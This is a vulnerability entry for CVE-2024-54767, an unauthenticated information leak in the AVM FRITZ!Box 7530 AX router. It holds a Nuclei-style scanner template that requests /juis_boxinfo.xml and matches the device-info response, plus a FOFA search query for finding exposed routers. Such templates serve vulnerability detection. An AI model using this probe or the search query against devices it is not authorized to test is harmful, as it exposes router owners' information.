漏洞描述
An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
CVE-2024-54767: AVM FRITZ!Box 7530 AX - Unauthorized Access
PoC代码[已公开]
id: CVE-2024-54767
info:
name: AVM FRITZ!Box 7530 AX - Unauthorized Access
author: DhiyaneshDK
severity: high
description: |
An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
reference:
- https://github.com/Shuanunio/CVE_Requests/blob/main/AVM/fritz/AVM_FRITZ%21Box_7530%20AX_unauthorized_access_vulnerability_first.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-54767
cwe-id: CWE-203
epss-score: 0.0401
epss-percentile: 0.88013
metadata:
verified: true
max-request: 1
fofa-query: body="FRITZ!Box 7530"
tags: cve,cve2024,fritz!box,info-leak,unauth
http:
- raw:
- |
GET //juis_boxinfo.xml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<e:BoxInfo"
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
# digest: 4a0a0047304502207b341c2c189391f295a4da31bf1d5d9a8206437d4fda6a430cd523d20e02ba57022100f1ddb68e7ea3a4a694e9b367cc334a268b3e5e482448031cd78c3e32fddd0378:922c64590222798bb761d5b6d8e72950